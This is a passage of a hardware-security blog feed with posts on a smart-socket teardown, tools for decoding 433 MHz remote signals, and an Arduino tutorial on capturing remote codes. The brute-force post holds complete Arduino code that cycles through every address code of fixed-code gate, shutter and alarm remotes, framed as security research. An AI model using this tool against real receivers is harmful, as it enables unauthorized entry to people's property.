brute force tool</a></li></ul>]]></content>
<summary type="html">
<p><a href="https://greatscottgadgets.com/yardstickone/" target="_blank" rel="noopener">YARD Stick One</a> is a sub-1 GHz USB wireless transceiver based on TI's <a href="http://www.ti.com/product/CC1110-CC1111" target="_blank" rel="noopener">CC1111</a> chip. You can use the YARD Stick One to replay all kinds of remote-control signals, for security research on car remote locks, and more.</p>
</summary>
<category term="Hardware" scheme="https://blog.iternull.com/tags/Hardware/"/>
<category term="Radio" scheme="https://blog.iternull.com/tags/Radio/"/>
<category term="YARD Stick One" scheme="https://blog.iternull.com/tags/YARD-Stick-One/"/>
</entry>
<entry>
<title>Teardown of the ITEAD Type 86 WiFi Smart Socket</title>
<link href="https://blog.iternull.com/posts/2017/03/01/Itead-Wall-WiFi-Smart-Socket.html"/>
<id>https://blog.iternull.com/posts/2017/03/01/Itead-Wall-WiFi-Smart-Socket.html</id>
<published>2017-03-01T07:30:20.000Z</published>
<updated>2017-03-24T22:14:04.478Z</updated>
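<content type="html"><![CDATA[<p>I found a product on Taobao that I really wanted, and it is made by ITEAD. There were already smart-home products before this one; Xiaomi, for example, has many of them. But they all have one thing in common: they are not compatible with other vendors' products, and you cannot customize them.<br>ITEAD products, however, have one distinctive feature: they leave a serial port for the user, so other firmware can be flashed without damaging the product, which gives the user more control. Another good point is that ITEAD's WiFi smart-home products almost all use the <a href="http://www.esp8266.com/wiki/doku.php?id=start" target="_blank" rel="noopener">ESP8266</a> chip. The ESP8266 is a very good WiFi chip: it is easy to develop for and has many active developer communities and users.<br><a id="more"></a></p>
<h3 id="购买链接-Buy"><a href="#购买链接-Buy" class="headerlink" title="购买链接 (Buy)"></a>Where to buy</h3>
<blockquote><ul><li><a href="https://item.taobao.com/item.htm?spm=a1z09.2.0.0.FKIVK3&id=530885314299&_u=111dg2jm9dab" target="_blank" rel="noopener">Taobao</a></li><li><a href="https://www.aliexpress.com/item/2016-New-Arrival-Smart-Wireless-WIFI-Control-Socket-Plug-With-Android-IOS-Phone-App-White-Remote/32703922119.html" target="_blank" rel="noopener">AliExpress</a></li></ul></blockquote>
<p><img src="//files.iternull.com/images/2017-03-01_01-0001.jpg" alt=""><br><img src="//files.iternull.com/images/2017-03-01_01-0002.jpg" alt=""><br><img src="//files.iternull.com/images/2017-03-01_01-0003.jpg" alt=""><br><img src="//files.iternull.com/images/2017-03-01_01-0004.jpg" alt=""><br><img src="//files.iternull.com/images/2017-03-01_01-0005.jpg" alt=""><br><img src="//files.iternull.com/images/2017-03-01_01-0006.jpg" alt=""><br><img src="//files.iternull.com/images/2017-03-01_01-0007.jpg" alt=""><br><img src="//files.iternull.com/images/2017-03-01_01-0008.jpg" alt=""><br><img src="//files.iternull.com/images/2017-03-01_01-0009.jpg" alt=""><br><img src="//files.iternull.com/images/2017-03-01_01-0010.jpg" alt=""><br><img src="//files.iternull.com/images/2017-03-01_01-0011.jpg" alt=""></p>
<p>This product uses the <a href="http://www.esp8266.com/wiki/doku.php?id=start" target="_blank" rel="noopener">ESP8266</a> chip with <a href="http://www.datasheetspdf.com/datasheet/PN25F08.html" target="_blank" rel="noopener">PN25F08</a> flash memory, and it has reserved serial-port pads, which makes it convenient for users to customize the hardware.<br>Some things could still be improved, though. The first impression from its appearance is that the build is a bit rough. Second, safety needs to improve: the socket openings have no safety shutters, so families with small children should think carefully before buying, because this raises the chance of a child getting an electric shock.<br>The internal AC-to-DC power module is not designed very safely, especially the AC input side, which is connected with long pin headers. With the flip-cover design left for fitting the mounting screws, the red live wire easily gets caught on the adjacent PCB when the cover is closed, which is neither convenient nor safe.</p>
<p>If you are interested, you can try the <a href="http://www.letscontrolit.com/wiki/index.php/ESPEasy" target="_blank" rel="noopener">ESPEasy</a> firmware to work with other cloud platforms for control and build your own smart home.</p>
<p>Overall this product is good value for money: 48 RMB with free shipping, far below the price of the basic Xiaomi smart socket. More importantly, it is a first step toward the future smart-home fitting market.</p>]]></content>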
<summary type="html">
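<p>I found a product on Taobao that I really wanted, and it is made by ITEAD. There were already smart-home products before this one; Xiaomi, for example, has many of them. But they all have one thing in common: they are not compatible with other vendors' products, and you cannot customize them.<br>ITEAD products, however, have one distinctive feature: they leave a serial port for the user, so other firmware can be flashed without damaging the product, which gives the user more control. Another good point is that ITEAD's WiFi smart-home products almost all use the <a href="http://www.esp8266.com/wiki/doku.php?id=start" target="_blank" rel="noopener">ESP8266</a> chip. The ESP8266 is a very good WiFi chip: it is easy to develop for and has many active developer communities and users.<br>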
</summary>
<category term="WiFi" scheme="https://blog.iternull.com/tags/WiFi/"/>
<category term="Smart Socket" scheme="https://blog.iternull.com/tags/Smart-Socket/"/>
<category term="ITEAD" scheme="https://blog.iternull.com/tags/ITEAD/"/>
</entry>
<entry>
<title>Analyzing Wireless Remote Control Signals and Building Hack Hardware to Attack Them</title>
<link href="https://blog.iternull.com/posts/2017/02/04/Use-Arduino-brute-force-to-attack-remote-control.html"/>
<id>https://blog.iternull.com/posts/2017/02/04/Use-Arduino-brute-force-to-attack-remote-control.html</id>
<published>2017-02-04T14:32:46.000Z</published>
<updated>2017-02-26T13:51:10.024Z</updated>
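<content type="html"><![CDATA[<p>Wireless (radio) remote controls are very common in daily life and are used in all kinds of settings for the user's convenience. Most of them, though, are used for security and access control, for example remote-controlled alarms, electric roller shutters, electric retractable gates, remote power switches, wireless doorbells and so on.<br>Few people in China pay attention to or research the security of this kind of hardware. I know most of you are Web security folks; I can't out-hunt you for bugs, so I became a hardware security guy.<br><a id="more"></a></p>
<h2 id="1、无线遥控器简介"><a href="#1、无线遥控器简介" class="headerlink" title="1、无线遥控器简介"></a>1. Introduction to wireless remote controls</h2>
<p>From a security point of view, wireless remotes fall roughly into two classes. One is the fixed-code remote, the most widespread: cheap, widely used, with a large market and many users. The other is the rolling-code remote: more expensive, comparatively secure, and used where security requirements are higher, such as car anti-theft systems.</p>
<p>Fixed-code remotes use many encoding schemes; the common ones in China are the 3-state 8-position encoding and random codes burned in by the vendor at the factory. Rolling codes are not covered here, as I have not even got hold of such a remote yet. Rolling codes are comparatively secure but not absolutely so: your car uses a rolling-code remote, yet thieves have been able to buy devices that jam and defeat car anti-theft systems for years.</p>
<p>By modulation, wireless remotes can be roughly divided into <a href="https://en.wikipedia.org/wiki/On-off_keying" target="_blank" rel="noopener">OOK</a> and <a href="https://en.wikipedia.org/wiki/Frequency-shift_keying" target="_blank" rel="noopener">FSK</a>. These are only the common ones; other modulation schemes exist.</p>
<h2 id="2、三态八位遥控器"><a href="#2、三态八位遥控器" class="headerlink" title="2、三态八位遥控器"></a>2. 3-state 8-position remotes</h2>
<p>The 3-state 8-position remote is the one we commonly see, and it is a fixed-code remote. It turns up in e-bike alarms, electric roller shutters, electric retractable gates, remote power switches and wireless doorbells, because it is very cheap.</p>
<h3 id="2-1-什么是三态八位遥控器?"><a href="#2-1-什么是三态八位遥控器?" class="headerlink" title="2.1 什么是三态八位遥控器?"></a>2.1 What is a 3-state 8-position remote?</h3>
<p>As the name suggests, a 3-state 8-position remote has 8 code positions, each with 3 possible states. Binary consists of <code>0</code> and <code>1</code>, so a 2-bit binary value has 4 possibilities: <code>00</code> <code>01</code> <code>10</code> <code>11</code>. A 3-state 8-position remote uses 3 of them, <code>00</code> <code>01</code> <code>11</code>; these are the 3 states.<br>The 8 positions are 8 code positions, each of which can take any of the 3 states, so that is <code>2 * 8 = 16</code>, 16 bits of binary in total. The data length of common wireless remotes is 24 bits, however, because the last 8 bits define the button value (if your decoded signal is 25 bits long, you can drop the trailing <code>0</code>; if it is 25 bits long and the trailing bit is <code>1</code>, you have probably decoded it wrongly).<br>On the common 4-button remote, each button value is fixed at the factory: <code>11000000</code> <code>00110000</code> <code>00001100</code> <code>00000011</code></p>
<h3 id="2-2-厂商烧录的固定码"><a href="#2-2-厂商烧录的固定码" class="headerlink" title="2.2 厂商烧录的固定码"></a>2.2 Vendor-burned fixed codes</h3>
<p>If the decoded binary of your fixed-code remote contains a <code>10</code> pair (it must be an aligned pair: a <code>10</code> formed by the trailing <code>1</code> of one pair and the leading <code>0</code> of the next does not count), your remote is not a 3-state 8-position remote but carries a fixed code burned in by the vendor at the factory. On such remotes the last 8 bits, the button value, are not necessarily one of the 4 standard possibilities either.</p>
<p>The receiver for this kind of fixed-code remote is usually the learning type and has a learn button, which is used to pair new remotes. If your current remote breaks, you can buy another of the same type, hold the learn button and then press the remote; the receiver learns the new remote's code and you can carry on using it.</p>
<h3 id="2-3-辨别是否是三态八位"><a href="#2-3-辨别是否是三态八位" class="headerlink" title="2.3 辨别是否是三态八位"></a>2.3 Telling whether a remote is 3-state 8-position</h3>
<p>The most reliable way to tell is to open the remote and look at the PCB: if it has 3 rows by 8 columns of solder pads it certainly is one, otherwise it is not. Remotes that use a 3-state 8-position DIP switch count as well.</p>
<p><img src="//files.iternull.com/images/2017-02-04_01-0001.png" alt=""></p>
<h3 id="2-4-三态八位遥控器编码"><a href="#2-4-三态八位遥控器编码" class="headerlink" title="2.4 三态八位遥控器编码"></a>2.4 Coding a 3-state 8-position remote</h3>
<p>In China the code is usually set by soldering pads directly on the PCB; DIP switches are rarely used, presumably to save cost. You can of course also buy 3-state 8-position DIP-switch remotes.</p>
<p><img src="//files.iternull.com/images/2017-02-04_01-0002.png" alt=""></p>
<p>The picture above shows 3 rows by 8 columns of pads, which is how the 3 states (top, middle, bottom) and 8 positions are defined. The middle row connects to the chip's pins. A pin soldered to High produces the code <code>11</code>, a pin soldered to Low produces <code>00</code>, and an unsoldered pin defaults to <code>01</code>.</p>
<p>Codes come in matching pairs: the receiver must be set to the same code as the remote, or it will not work.</p>
<h2 id="3、分析安全缺陷"><a href="#3、分析安全缺陷" class="headerlink" title="3、分析安全缺陷"></a>3. Analyzing the security weakness</h2>
<p>From the above we know the remote's binary code is 24 bits long: the first 16 bits are defined by the 3-state 8-position encoding, and the last 8 bits are the button value hard-wired by the vendor. Every button on a remote shares the same first 16 bits and differs only in the last 8 bits, of which there are just 4 possibilities.<br>If every button used an unstructured random code, brute-forcing the correct code would take <code>2 ^ 24 = 16777216</code>, 16777216 possibilities in total.<br>If the last 8 bits are one of the 4 fixed values and the first 16 bits are random, you only need to try every possibility for the first 16 bits with the fixed last 8 bits appended: <code>2 ^ 16 = 65536</code> <code>4 ^ 8 = 65536</code>, 65536 possibilities per button.<br>Because the 3-state 8-position encoding has no <code>10</code> code, the number of attempts needed is <code>3 ^ 8 = 6561</code>, 6561 possibilities per button.</p>
<p>Knowing how many attempts a brute-force attack needs, let's work out the time. I captured the transmissions of an ordinary remote: within 10 seconds the receiver got a hundred-odd remote signals, which means at least 600 possibilities can be sent (tried) per minute.<br>Trying every 24-bit combination takes <code>16777216 / 600 = 27962</code>, about 27962 minutes, a little under 20 days. Trying every 16-bit combination for one button takes <code>65536 / 600 = 109</code>, about 109 minutes, a bit over an hour.<br>Trying every 3-state 8-position combination for one button takes <code>6561 / 600 = 11</code>, only about 11 minutes!</p>
<p>So how did <a href="https://samy.pl/" target="_blank" rel="noopener">Samy Kamkar</a>'s <a href="http://samy.pl/opensesame/" target="_blank" rel="noopener">OpenSesame</a> project open a garage door within 8 seconds?<br>First, the garage-door remote in that case was not 3-state 8-position; its code length seems to be only 12 bits, <code>2 ^ 12 = 4096</code>, 4096 combinations in total.<br>The key point is that the receiver of that remote device uses a <a href="https://en.wikipedia.org/wiki/Shift_register" target="_blank" rel="noopener">shift register</a>, so a <a href="https://en.wikipedia.org/wiki/De_Bruijn_sequence" target="_blank" rel="noopener">De Bruijn sequence</a> can cover every possibility in a very short time.</p>
<p>The receivers of the common 3-state 8-position remote devices, however, do not use a shift register, so a De Bruijn sequence cannot be used to brute-force them. One way to test whether a receiver uses a shift register is to put a <code>0</code> in front of the correct code.<br>If a shift register is used, the receiver skips the one wrong bit, checks the correct code that follows and responds. If not, nothing happens at all, because the code you sent is wrong.</p>
<h2 id="4、制作-Hacking-硬件"><a href="#4、制作-Hacking-硬件" class="headerlink" title="4、制作 Hacking 硬件"></a>4. Building the hacking hardware</h2>
<p>The theoretical analysis above identified one weakness of this kind of remote device, and there is more than one way to try to exploit it. You can carry your laptop and an SDR device to attack it, or we can try building our own portable hardware to exploit the weakness.</p>
<p>Here we use an Arduino and an RF module to implement the attack. Arduino is used because it is cheap and easy to get started with. If you have the skills you can of course use another microcontroller, or design your own circuit and use the better CC1111 chip for the RF side.</p>
<h3 id="4-1-硬件列表"><a href="#4-1-硬件列表" class="headerlink" title="4.1 硬件列表"></a>4.1 Hardware list</h3>
<ol><li>Arduino Pro Micro</li><li>315 MHz or 433 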
MHz wireless module</li><li>Tactile push button</li><li>10 K resistor</li><li>Breadboard</li><li>Breadboard jumper wires</li></ol>
<h3 id="4-2-硬件连接方式"><a href="#4-2-硬件连接方式" class="headerlink" title="4.2 硬件连接方式"></a>4.2 Wiring</h3>
<p><img src="//files.iternull.com/images/2017-02-04_01-0003.png" alt=""><br><img src="//files.iternull.com/images/2017-02-04_01-0004.jpg" alt=""></p>
<h3 id="4-3-功能代码"><a href="#4-3-功能代码" class="headerlink" title="4.3 功能代码"></a>4.3 Code</h3>
<figure class="highlight c"><table><tr><td class="code"><pre><span class="line"><span class="comment">/*</span></span><br><span class="line"><span class="comment"> Brute Force Attack 4 ^ 8 Remote Control</span></span><br><span class="line"><span class="comment"> </span></span><br><span class="line"><span class="comment"> https://github.com/iternull/bruteforce3-8remote</span></span><br><span class="line"><span class="comment"> </span></span><br><span class="line"><span class="comment">*/</span></span><br><span class="line"></span><br><span class="line"><span class="meta">#<span class="meta-keyword">include</span> <span class="meta-string"><stdio.h></span></span></span><br><span class="line"><span class="meta">#<span class="meta-keyword">include</span> <span class="meta-string"><RCSwitch.h></span></span></span><br><span class="line"></span><br><span class="line">RCSwitch mySwitch = RCSwitch();</span><br><span class="line"></span><br><span class="line"><span class="comment">// Pins for the 4 buttons</span></span><br><span class="line"><span class="keyword">const</span> <span class="keyword">int</span> button_a = <span class="number">10</span>;</span><br><span class="line"><span class="keyword">const</span> <span class="keyword">int</span> button_b = <span class="number">16</span>;</span><br><span class="line"><span class="keyword">const</span> <span class="keyword">int</span> button_c = <span class="number">14</span>;</span><br><span class="line"><span class="keyword">const</span> <span class="keyword">int</span> button_d = <span class="number">15</span>;</span><br><span class="line"></span><br><span class="line"><span class="keyword">int</span> butStatA = <span class="number">0</span>;</span><br><span class="line"><span class="keyword">int</span> butStatB = <span class="number">0</span>;</span><br><span class="line"><span class="keyword">int</span> butStatC = <span class="number">0</span>;</span><br><span class="line"><span class="keyword">int</span> butStatD = <span class="number">0</span>;</span><br><span class="line"><span class="keyword">int</span> dfa = <span class="number">256</span>; <span class="comment">// multiplier that shifts the 16-bit address above the 8-bit button value</span></span><br><span class="line"></span><br><span class="line"><span class="function"><span class="keyword">void</span> <span class="title">setup</span><span class="params">()</span> </span>{</span><br><span class="line"></span><br><span class="line">  Serial.begin(<span class="number">9600</span>);</span><br><span class="line"> </span><br><span class="line">  mySwitch.enableTransmit(<span class="number">9</span>); <span class="comment">// Data pin of the transmitter module</span></span><br><span class="line">  mySwitch.setPulseLength(<span class="number">170</span>); <span class="comment">// Pulse length; the right value depends on the remote you are using</span></span><br><span class="line">  pinMode(button_a, INPUT);</span><br><span class="line">  pinMode(button_b, INPUT);</span><br><span class="line">  pinMode(button_c, INPUT);</span><br><span class="line">  pinMode(button_d, INPUT);</span><br><span class="line"> </span><br><span class="line">}</span><br><span
class="line"></span><br><span class="line"><span class="function"><span class="keyword">void</span> <span class="title">loop</span><span class="params">()</span> </span>{</span><br><span class="line"></span><br><span class="line">  <span class="comment">// read the state of the pushbutton value:</span></span><br><span class="line">  butStatA = digitalRead(button_a);</span><br><span class="line">  butStatB = digitalRead(button_b);</span><br><span class="line">  butStatC = digitalRead(button_c);</span><br><span class="line">  butStatD = digitalRead(button_d);</span><br><span class="line"></span><br><span class="line">  <span class="comment">// Button A (button value 192 = 11000000)</span></span><br><span class="line">  <span class="keyword">if</span> (butStatA == HIGH) { <span class="comment">// check if the pushbutton is pressed.</span></span><br><span class="line">    <span class="keyword">for</span> (<span class="keyword">long</span> i = <span class="number">0</span>; i < <span class="number">65536</span>; i++ ){ <span class="comment">// i = 0 .. 65535: every 16-bit address value</span></span><br><span class="line">      <span class="keyword">long</span> key = <span class="keyword">long</span>(i * dfa) + <span class="keyword">int</span>(<span class="number">192</span>);</span><br><span class="line">      mySwitch.send(key, <span class="number">24</span>);</span><br><span class="line">    }</span><br><span class="line">  }</span><br><span class="line"> </span><br><span class="line">  <span class="comment">// Button B (button value 48 = 00110000)</span></span><br><span class="line">  <span class="keyword">if</span> (butStatB == HIGH) {</span><br><span class="line">    <span class="keyword">for</span> (<span class="keyword">long</span> i = <span class="number">0</span>; i < <span class="number">65536</span>; i++ ){</span><br><span class="line">      <span class="keyword">long</span> key = <span class="keyword">long</span>(i * dfa) + <span class="keyword">int</span>(<span class="number">48</span>);</span><br><span class="line">      mySwitch.send(key, <span class="number">24</span>);</span><br><span class="line">    }</span><br><span class="line">  }</span><br><span
class="line"> </span><br><span class="line">  <span class="comment">// Button C (button value 12 = 00001100)</span></span><br><span class="line">  <span class="keyword">if</span> (butStatC == HIGH) {</span><br><span class="line">    <span class="keyword">for</span> (<span class="keyword">long</span> i = <span class="number">0</span>; i < <span class="number">65536</span>; i++ ){</span><br><span class="line">      <span class="keyword">long</span> key = <span class="keyword">long</span>(i * dfa) + <span class="keyword">int</span>(<span class="number">12</span>);</span><br><span class="line">      mySwitch.send(key, <span class="number">24</span>);</span><br><span class="line">    }</span><br><span class="line">  }</span><br><span class="line"> </span><br><span class="line">  <span class="comment">// Button D (button value 3 = 00000011)</span></span><br><span class="line">  <span class="keyword">if</span> (butStatD == HIGH) {</span><br><span class="line">    <span class="keyword">for</span> (<span class="keyword">long</span> i = <span class="number">0</span>; i < <span class="number">65536</span>; i++ ){</span><br><span class="line">      <span class="keyword">long</span> key = <span class="keyword">long</span>(i * dfa) + <span class="keyword">int</span>(<span class="number">3</span>);</span><br><span class="line">      mySwitch.send(key, <span class="number">24</span>);</span><br><span class="line">    }</span><br><span class="line">  }</span><br><span class="line"></span><br><span class="line">}</span><br></pre></td></tr></table></figure>
<ul><li>Note: this code sends all <code>4 ^ 8</code> possibilities.</li></ul>
<p>I have not yet implemented the algorithm that generates all <code>3 ^ 8</code> possibilities, and I have no time right now to keep working on it; <strong>after the New Year holiday I need to go job hunting</strong>.</p>
<h2 id="5、总结"><a href="#5、总结" class="headerlink" title="5、总结"></a>5. Summary</h2>
<p>In real tests the brute-force attack did work, but because I was short of time neither the hardware design nor the code is optimized, so the attack is still on the slow side. If you use this type of remote device, you don't need to worry too much.</p>
<p><a href="https://github.com/iternull/bruteforce3-8remote" target="_blank" rel="noopener">bruteforce3-8remote</a> 
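will keep being updated, aiming to make it as usable as possible, with more features to come.<br>For now I have to get busy looking for a job, which is the real priority. In the future I will look into other hardware security cracking and reverse-engineering projects.</p><p>Finally, thanks to a friend of mine (anonymous) for the help.</p>]]></content>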
<summary type="html">
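<p>Wireless (radio) remote controls are very common in daily life and are used in all kinds of settings for the user's convenience. Most of them, though, are used for security and access control, for example remote-controlled alarms, electric roller shutters, electric retractable gates, remote power switches, wireless doorbells and so on.<br>Few people in China pay attention to or research the security of this kind of hardware. I know most of you are Web security folks; I can't out-hunt you for bugs, so I became a hardware security guy.<br>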
</summary>
<category term="433 MHz" scheme="https://blog.iternull.com/tags/433-MHz/"/>
<category term="Attack" scheme="https://blog.iternull.com/tags/Attack/"/>
<category term="Arduino" scheme="https://blog.iternull.com/tags/Arduino/"/>
<category term="Brute Force" scheme="https://blog.iternull.com/tags/Brute-Force/"/>
</entry>
<entry>
<title>N Ways to Decode Wireless Remote Control Signals</title>
<link href="https://blog.iternull.com/posts/2017/02/02/Decoding-Remote-Control-Signals.html"/>
<id>https://blog.iternull.com/posts/2017/02/02/Decoding-Remote-Control-Signals.html</id>
<published>2017-02-02T14:38:14.000Z</published>
<updated>2017-02-11T05:57:02.102Z</updated>
<content type="html"><![CDATA[<p>In this article, a wireless remote control means a remote whose signal is <a href="https://en.wikipedia.org/wiki/On-off_keying" target="_blank" rel="noopener">OOK</a>-modulated, the most common kind in everyday life.<br><a id="more"></a></p>
<p><img src="//files.iternull.com/images/2017-02-02_01-0001.jpg" alt=""> </p>
<h3 id="1、RC-Switch"><a href="#1、RC-Switch" class="headerlink" title="1、RC Switch"></a>1. RC Switch</h3>
<p><a href="https://github.com/sui77/rc-switch" target="_blank" rel="noopener">rc switch</a> is a library for <a href="https://www.arduino.cc/" target="_blank" rel="noopener">Arduino</a>. It lets you use an Arduino to receive and decode remote-control signals and to send signals with custom codes.</p>
<p><img src="//files.iternull.com/images/2017-02-02_01-0002.png" alt=""> </p>
<h3 id="2、RTL-433"><a href="#2、RTL-433" class="headerlink" title="2、RTL_433"></a>2. RTL_433</h3>
<p><a href="https://github.com/merbanan/rtl_433" target="_blank" rel="noopener">rtl_433</a> is a generic <code>433.92 MHz</code> data receiver based on <code>RTL2832</code> TV dongles. It was designed to decode wireless thermometer data, and it can also decode other common signal encodings.<br> <code>rtl_433</code> is not limited to the <code>433 MHz</code> band: it receives on <code>433920000 Hz</code> by default, and the frequency can be set with the <code>-f</code> option.</p>
<p><img src="//files.iternull.com/images/2017-02-02_01-0003.png" alt=""></p>
<h3 id="3、RFCat"><a href="#3、RFCat" class="headerlink" title="3、RFCat"></a>3. RFCat</h3>
<p><a href="https://bitbucket.org/atlas0fd00m/rfcat" target="_blank" rel="noopener">rfcat</a> is a project based on the <a href="http://www.ti.com/" target="_blank" rel="noopener">TI</a> <a href="http://www.ti.com/product/CC1110-CC1111" target="_blank" rel="noopener">CC1111</a> chip.<br>rfcat supports three pieces of hardware: <a href="http://www.ti.com/tool/cc1111emk868-915" target="_blank" rel="noopener">CC1111EMK</a>, <a href="http://www.ti.com/tool/EZ430-CHRONOS" target="_blank" rel="noopener">Chronos USB RF Dongle</a> and <a href="http://greatscottgadgets.com/yardstickone/" target="_blank" rel="noopener">YARD Stick One</a>. All three can both transmit and receive, and they are relatively expensive.<br>The hardware must be flashed with the bootloader specified by rfcat before it can be used. The rfcat client is written in Python, so building on it is fairly easy; a signal brute-force tool named <a href="https://github.com/exploitagency/github-rfpwnon" target="_blank" rel="noopener">rfpwnon</a> was developed on top of it.</p>
<h3 id="4、Inspectrum"><a href="#4、Inspectrum" class="headerlink" title="4、Inspectrum"></a>4. Inspectrum</h3>
<p><a href="https://github.com/miek/inspectrum" target="_blank" rel="noopener">inspectrum</a> is a specialized tool for analyzing and decoding signal files captured from <a href="https://en.wikipedia.org/wiki/Software-defined_radio" target="_blank" rel="noopener">SDR</a> devices.<br>Used together with <a href="https://github.com/tresacton/dspectrum" target="_blank" rel="noopener">dspectrum</a>, inspectrum makes decoding signals more convenient.</p>
<p><img src="//files.iternull.com/images/2017-02-02_01-0004.png" alt=""></p>
<ul><li>Note: the version in the official Kali Linux repository is too old; after installing it you will find that the features you want are missing. Build and install it manually. If the build fails, check that the <code>libliquid-dev</code> dependency is installed, or resolve the problem from the error messages.</li></ul>
<h3 id="5、WaveConverter"><a href="#5、WaveConverter" class="headerlink" title="5、WaveConverter"></a>5. WaveConverter</h3>
<p><a href="https://github.com/paulgclark/waveconverter" target="_blank" rel="noopener">WaveConverter</a> is another specialized tool for decoding signals from <a href="https://en.wikipedia.org/wiki/Software-defined_radio" target="_blank" rel="noopener">SDR</a> devices.</p>
<p><img src="//files.iternull.com/images/2017-02-02_01-0005.png" alt=""></p>
<h3 id="6、Audacity"><a href="#6、Audacity" class="headerlink" title="6、Audacity"></a>6. Audacity</h3>
<p><a href="http://www.audacityteam.org/" target="_blank" rel="noopener">Audacity</a> is an audio editor. It is also a long-established tool for decoding signals captured with <a href="https://en.wikipedia.org/wiki/Software-defined_radio" target="_blank" rel="noopener">SDR</a> devices; it is very capable and can decode captured <a href="https://en.wikipedia.org/wiki/Impulse_response" target="_blank" rel="noopener">IR</a> signals too. It is cumbersome to use, though, and may be hard for beginners to pick up.</p>
<p><img src="//files.iternull.com/images/2017-02-02_01-0006.png" alt=""></p>
<hr><ul><li>Note: the methods listed above are only the common ones.</li></ul>]]></content>
<summary type="html">
<p>In this article, a wireless remote control means a remote whose signal is <a href="https://en.wikipedia.org/wiki/On-off_keying" target="_blank" rel="noopener">OOK</a>-modulated, the most common kind in everyday life.<br>
</summary>
<category term="433 MHz" scheme="https://blog.iternull.com/tags/433-MHz/"/>
<category term="Decoding" scheme="https://blog.iternull.com/tags/Decoding/"/>
</entry>
<entry>
<title>Reverse Engineering Remote Controls with Arduino and RC Switch</title>
<link href="https://blog.iternull.com/posts/2017/01/29/Use-the-Arduino-and-RC-Switch-reverse-remote-controls.html"/>
<id>https://blog.iternull.com/posts/2017/01/29/Use-the-Arduino-and-RC-Switch-reverse-remote-controls.html</id>
<published>2017-01-29T09:07:41.000Z</published>
<updated>2017-02-11T06:01:31.175Z</updated>
<content type="html"><![CDATA[<p>To capture, analyze and replay remote-control signals we usually use SDR hardware. Common choices are the R820T2+RTL2832U, CC1111EMK, Yardstick One, HackRF One and so on.<br>The R820T2+RTL2832U TV dongle is the cheapest SDR device, available for about 35 RMB; the others are all fairly expensive. With the TV dongle, however, you can only receive signals, not transmit them.</p>
<p>Here we use even cheaper hardware (an Arduino plus a 315 or 433 MHz super-regenerative module) to analyze and replay the signals of common fixed-code remote controls.<br><a id="more"></a><br>All common Arduino boards are supported. It is worth buying several pairs of radio modules for different frequency bands, since they are inexpensive.</p>
<h2 id="1、接收-解码信号"><a href="#1、接收-解码信号" class="headerlink" title="1. Receiving / decoding the signal"></a>1. Receiving / decoding the signal</h2>
<p>Here we use the <a href="https://github.com/sui77/rc-switch" target="_blank" rel="noopener">RC Switch</a> library to receive and decode the signal.</p>
<h3 id="1-1-安装-RC-Switch-库"><a href="#1-1-安装-RC-Switch-库" class="headerlink" title="1.1 Installing the RC Switch library"></a>1.1 Installing the RC Switch library</h3>
<p>Open the Arduino IDE, open the Library Manager from the menu bar via Sketch > Include Library > Manage Libraries, then search for <code>rc switch</code> and install it.</p>
<p><img src="//files.iternull.com/images/2017-01-29_01-0001.png" alt=""></p>
<h3 id="1-2-连接-Arduino-和接收模块"><a href="#1-2-连接-Arduino-和接收模块" class="headerlink" title="1.2 Connecting the Arduino and the receiver module"></a>1.2 Connecting the Arduino and the receiver module</h3>
<p><img src="//files.iternull.com/images/2017-01-29_01-0002.png" alt=""></p>
<p>Connect the Arduino to the computer with a data cable and select the matching board and port in the Arduino IDE.</p>
<p><img src="//files.iternull.com/images/2017-01-29_01-0003.png" alt=""></p>
<h3 id="1-3-上传代码"><a href="#1-3-上传代码" class="headerlink" title="1.3 Uploading the code"></a>1.3 Uploading the code</h3>
<p>Open the example sketch for receiving signals, from the menu bar under File > Examples > rc-switch > ReceiveDemo_Simple.</p>
<figure class="highlight c"><table><tr><td class="code"><pre><span class="line"><span class="comment">/*</span></span><br><span class="line"><span class="comment">  Simple example for receiving</span></span><br><span class="line"><span class="comment">  </span></span><br><span class="line"><span class="comment">  https://github.com/sui77/rc-switch/</span></span><br><span class="line"><span class="comment">*/</span></span><br><span class="line"></span><br><span class="line"><span class="meta">#<span class="meta-keyword">include</span> <span class="meta-string">&lt;RCSwitch.h&gt;</span></span></span><br><span class="line"></span><br><span class="line">RCSwitch mySwitch = RCSwitch();</span><br><span class="line"></span><br><span class="line"><span class="function"><span class="keyword">void</span> <span class="title">setup</span><span class="params">()</span> </span>{</span><br><span class="line">  Serial.begin(<span class="number">9600</span>);</span><br><span class="line">  mySwitch.enableReceive(<span class="number">0</span>);  <span class="comment">// Receiver on interrupt 0 => that is pin #2</span></span><br><span class="line">}</span><br><span class="line"></span><br><span class="line"><span class="function"><span class="keyword">void</span> <span class="title">loop</span><span class="params">()</span> </span>{</span><br><span class="line">  <span class="keyword">if</span> (mySwitch.available()) {</span><br><span class="line">    </span><br><span class="line">    <span class="comment">// unsigned long, not int: getReceivedValue() returns unsigned long and a 24-bit code overflows a 16-bit int on AVR boards</span></span><br><span class="line">    <span class="keyword">unsigned</span> <span class="keyword">long</span> value = mySwitch.getReceivedValue();</span><br><span class="line">    </span><br><span class="line">    <span class="keyword">if</span> (value == <span class="number">0</span>) {</span><br><span class="line">      Serial.println(<span class="string">"Unknown encoding"</span>);</span><br><span class="line">    } <span class="keyword">else</span> {</span><br><span class="line">      Serial.print(<span class="string">"Received "</span>);</span><br><span class="line">      Serial.print( mySwitch.getReceivedValue() );</span><br><span class="line">      Serial.print(<span class="string">" / "</span>);</span><br><span class="line">      Serial.print( mySwitch.getReceivedBitlength() );</span><br><span class="line">      Serial.print(<span class="string">"bit "</span>);</span><br><span class="line">      Serial.print(<span class="string">"Protocol: "</span>);</span><br><span class="line">      Serial.println( mySwitch.getReceivedProtocol() );</span><br><span class="line">    }</span><br><span class="line"></span><br><span class="line">    mySwitch.resetAvailable();</span><br><span class="line">  }</span><br><span class="line">}</span><br></pre></td></tr></table></figure>
<p>Click Upload to upload the code to the Arduino.</p>
<p><img src="//files.iternull.com/images/2017-01-29_01-0004.png" alt=""></p>
<p>One thing to note: a line in <code>void setup()</code> defines the pin used to receive data. The pin differs between Arduino models, and wiring it incorrectly will keep the Arduino from working properly; see the Arduino documentation for details.</p>
<figure class="highlight c"><table><tr><td class="code"><pre><span class="line">mySwitch.enableReceive(<span class="number">0</span>);  <span class="comment">// Receiver on interrupt 0 => that is pin #2</span></span><br></pre></td></tr></table></figure>
<h3 id="1-4-查看信号解码"><a href="#1-4-查看信号解码" class="headerlink" title="1.4 Viewing the decoded signal"></a>1.4 Viewing the decoded signal</h3>
